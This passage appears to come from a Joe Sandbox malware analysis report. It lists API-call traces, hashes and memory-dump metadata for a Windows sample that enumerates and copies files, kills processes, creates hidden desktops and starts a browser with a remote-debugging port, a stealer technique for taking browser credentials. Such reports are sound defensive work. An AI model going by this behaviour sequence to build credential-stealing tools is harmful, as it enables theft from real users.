                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 2af4fe12189f222a9a41a3ed0573691f23b9dc96002b3763fdaaa6717c523761
                            • Instruction ID: 517d1b248dc574f4f4ec7e7b7426db1a654859891555a342c6b9dd38410fe0e4
                            • Opcode Fuzzy Hash: 2af4fe12189f222a9a41a3ed0573691f23b9dc96002b3763fdaaa6717c523761
                            • Instruction Fuzzy Hash: 10C14072A003199FDB64DF64DC49AEE7BB9EF44300F5445A8F509E7290DB70AA85CFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B11291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B112BF
                            • lstrlen.KERNEL32(00B34CA8), ref: 00B112CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B112E7
                            • lstrcat.KERNEL32(00000000,00B34CA8), ref: 00B112F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00B1133A
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1135C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B11376
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B113AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B113D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B113E2
                            • lstrlen.KERNEL32(00B31794), ref: 00B113ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1140A
                            • lstrcat.KERNEL32(00000000,00B31794), ref: 00B11416
                            • lstrlen.KERNEL32(?), ref: 00B11423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11443
                            • lstrcat.KERNEL32(00000000,?), ref: 00B11451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B1147A
                            • StrCmpCA.SHLWAPI(?,0187D418), ref: 00B114A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B114E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B11535
                            • StrCmpCA.SHLWAPI(?,0187DB70), ref: 00B11552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B115BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B115E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B11796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B117BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B117F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1181C
                            • FindClose.KERNEL32(00000000), ref: 00B1182B
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 62b2b6e74e37d82d9e5a0e27db963a2be808cdd0fbeef1d3fe3f4fceb26f007e
                            • Instruction ID: 3bc89a945502f5cec762e8aa7a5505dc2338d1859704aa4a35a43f6c0d058aab
                            • Opcode Fuzzy Hash: 62b2b6e74e37d82d9e5a0e27db963a2be808cdd0fbeef1d3fe3f4fceb26f007e
                            • Instruction Fuzzy Hash: 4BC16F71A117069BCB21EF78D889AAE7BF8EF44700F4444A8B945E7291DB34DD498BA0
                            APIs
                            • memset.MSVCRT ref: 00B09790
                            • lstrcat.KERNEL32(?,?), ref: 00B097A0
                            • lstrcat.KERNEL32(?,?), ref: 00B097B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00B097C3
                            • memset.MSVCRT ref: 00B097D7
                              • Part of subcall function 00B23E70: lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B23EA5
                              • Part of subcall function 00B23E70: lstrcpy.KERNEL32(00000000,0187E278), ref: 00B23ECF
                              • Part of subcall function 00B23E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00B0134E,?,0000001A), ref: 00B23ED9
                            • wsprintfA.USER32 ref: 00B09806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00B09827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00B09844
                              • Part of subcall function 00B246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B246B9
                              • Part of subcall function 00B246A0: Process32First.KERNEL32(00000000,00000128), ref: 00B246C9
                              • Part of subcall function 00B246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00B246DB
                              • Part of subcall function 00B246A0: StrCmpCA.SHLWAPI(?,?), ref: 00B246ED
                              • Part of subcall function 00B246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B24702
                              • Part of subcall function 00B246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00B24711
                              • Part of subcall function 00B246A0: CloseHandle.KERNEL32(00000000), ref: 00B24718
                              • Part of subcall function 00B246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00B24726
                              • Part of subcall function 00B246A0: CloseHandle.KERNEL32(00000000), ref: 00B24731
                            • lstrcat.KERNEL32(00000000,?), ref: 00B09878
                            • lstrcat.KERNEL32(00000000,?), ref: 00B09889
                            • lstrcat.KERNEL32(00000000,00B34B60), ref: 00B0989B
                            • memset.MSVCRT ref: 00B098AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B098D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B09903
                            • StrStrA.SHLWAPI(00000000,0187EF30), ref: 00B09919
                            • lstrcpyn.KERNEL32(00D393D0,00000000,00000000), ref: 00B09938
                            • lstrlen.KERNEL32(?), ref: 00B0994B
                            • wsprintfA.USER32 ref: 00B0995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00B09971
                            • Sleep.KERNEL32(00001388), ref: 00B099E7
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B092E1
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B092FA
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B09399
                              • Part of subcall function 00B092B0: strlen.MSVCRT ref: 00B093E6
                              • Part of subcall function 00B24740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00B24759
                              • Part of subcall function 00B24740: Process32First.KERNEL32(00000000,00000128), ref: 00B24769
                              • Part of subcall function 00B24740: Process32Next.KERNEL32(00000000,00000128), ref: 00B2477B
                              • Part of subcall function 00B24740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2479C
                              • Part of subcall function 00B24740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00B247AB
                              • Part of subcall function 00B24740: CloseHandle.KERNEL32(00000000), ref: 00B247B2
                              • Part of subcall function 00B24740: Process32Next.KERNEL32(00000000,00000128), ref: 00B247C0
                              • Part of subcall function 00B24740: CloseHandle.KERNEL32(00000000), ref: 00B247CB
                            • CloseDesktop.USER32(?), ref: 00B09A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: b49d4038cef6e0acb5a069fdeeadf8c236bbd07ce1e6afaa1f48eb95f202857d
                            • Instruction ID: 4d1b191370a637b3a01c2e52819429dde9a4b008c51679a6b11361a7f4b3c02a
                            • Opcode Fuzzy Hash: b49d4038cef6e0acb5a069fdeeadf8c236bbd07ce1e6afaa1f48eb95f202857d
                            • Instruction Fuzzy Hash: 6C914471A50318ABDB14DF74DC49FDEB7B8AF48700F104595F609E7291DF71AA488BA0
                            APIs
                            • wsprintfA.USER32 ref: 00B1E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1E243
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1E263
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1E27D
                            • wsprintfA.USER32 ref: 00B1E2A2
                            • StrCmpCA.SHLWAPI(?,00B2CFEC), ref: 00B1E2B4
                            • wsprintfA.USER32 ref: 00B1E2D1
                              • Part of subcall function 00B1EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00B1EE12
                            • wsprintfA.USER32 ref: 00B1E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00B1E304
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1E335
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1E347
                            • lstrcat.KERNEL32(?,?), ref: 00B1E358
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1E36A
                            • lstrcat.KERNEL32(?,?), ref: 00B1E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1E422
                            • DeleteFileA.KERNEL32(?), ref: 00B1E45C
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1E49B
                            • FindClose.KERNEL32(00000000), ref: 00B1E4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: f91376454ee9fabb905e9a82b8a4e39010884ac18b3e0f712c7017eae7a00f31
                            • Instruction ID: 6302f39e506b084fcdc55c8fc9074526ebeed5dc1c2e7dff5efbcabd4a7c0f83
                            • Opcode Fuzzy Hash: f91376454ee9fabb905e9a82b8a4e39010884ac18b3e0f712c7017eae7a00f31
                            • Instruction Fuzzy Hash: B38150719003189BCB24EF64DC49AEE77B9BF44300F4449E8B91AD7291DB74EA49CFA0
                            APIs
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B016E2
                            • lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B01719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B0176C
                            • lstrcat.KERNEL32(00000000), ref: 00B01776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00B017A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B018F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00B018FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 21e2702ed00243ec2f8ad362730f39f411ef5290eb7146a61dd7f16fc692e1b1
                            • Instruction ID: e1cb36a50d27fe152afca2adb100d60a9b707f7e3441458f7d0073e879001869
                            • Opcode Fuzzy Hash: 21e2702ed00243ec2f8ad362730f39f411ef5290eb7146a61dd7f16fc692e1b1
                            • Instruction Fuzzy Hash: A4815271A116169BCB26EF6CD999AAEBFF4EF44300F0445A4F805E7291DB30DD09CBA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B1DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B1DD4C
                            • wsprintfA.USER32 ref: 00B1DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1DD79
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1DD9C
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1DDB6
                            • wsprintfA.USER32 ref: 00B1DDD4
                            • DeleteFileA.KERNEL32(?), ref: 00B1DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00B1DDED
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01557
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B01579
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B0159B
                              • Part of subcall function 00B01530: lstrcpy.KERNEL32(00000000,?), ref: 00B015FF
                              • Part of subcall function 00B1D980: memset.MSVCRT ref: 00B1D9A1
                              • Part of subcall function 00B1D980: memset.MSVCRT ref: 00B1D9B3
                              • Part of subcall function 00B1D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00B1D9DB
                              • Part of subcall function 00B1D980: lstrcpy.KERNEL32(00000000,?), ref: 00B1DA0E
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,00000000), ref: 00B1DA1C
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,0187EE88), ref: 00B1DA36
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,?), ref: 00B1DA4A
                              • Part of subcall function 00B1D980: lstrcat.KERNEL32(?,0187D178), ref: 00B1DA5E
                              • Part of subcall function 00B1D980: lstrcpy.KERNEL32(00000000,?), ref: 00B1DA8E
                              • Part of subcall function 00B1D980: GetFileAttributesA.KERNEL32(00000000), ref: 00B1DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1DE2E
                            • FindClose.KERNEL32(00000000), ref: 00B1DE3D
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1DE66
                            • lstrcat.KERNEL32(?,0187DC50), ref: 00B1DE7A
                            • lstrlen.KERNEL32(?), ref: 00B1DE84
                            • lstrlen.KERNEL32(?), ref: 00B1DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1DED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                            • String ID: %s\%s$%s\*
                            • API String ID: 4184593125-2848263008
                            • Opcode ID: c76a59daba55deea26abee5b3a061d185f62c4238cf8dc3daaccadcf665634ec
                            • Instruction ID: 894397d80c98ca406ce116b2cb1a7a12aeb9359b2d2308ee72a92e80b615d86b
                            • Opcode Fuzzy Hash: c76a59daba55deea26abee5b3a061d185f62c4238cf8dc3daaccadcf665634ec
                            • Instruction Fuzzy Hash: 97613172A10318ABCB14EF74DC89ADE77B9BF48301F4445A4B545D7291DF34AA49CF60
                            APIs
                            • wsprintfA.USER32 ref: 00B1D54D
                            • FindFirstFileA.KERNEL32(?,?), ref: 00B1D564
                            • StrCmpCA.SHLWAPI(?,00B317A0), ref: 00B1D584
                            • StrCmpCA.SHLWAPI(?,00B317A4), ref: 00B1D59E
                            • lstrcat.KERNEL32(?,0187F208), ref: 00B1D5E3
                            • lstrcat.KERNEL32(?,0187F2B8), ref: 00B1D5F7
                            • lstrcat.KERNEL32(?,?), ref: 00B1D60B
                            • lstrcat.KERNEL32(?,?), ref: 00B1D61C
                            • lstrcat.KERNEL32(?,00B31794), ref: 00B1D62E
                            • lstrcat.KERNEL32(?,?), ref: 00B1D642
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1D682
                            • lstrcpy.KERNEL32(00000000,?), ref: 00B1D6D2
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00B1D737
                            • FindClose.KERNEL32(00000000), ref: 00B1D746
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 50252434-4073750446
                            • Opcode ID: 74aff4e8caaab226bca8c2f88ae61749c0d19a399187a5d2c3083d1c390f6f85
                            • Instruction ID: 2dbc12b69e8b031abb7919c7a9bc1dfa4e9337016b150b6af8790aa6d9dd990d
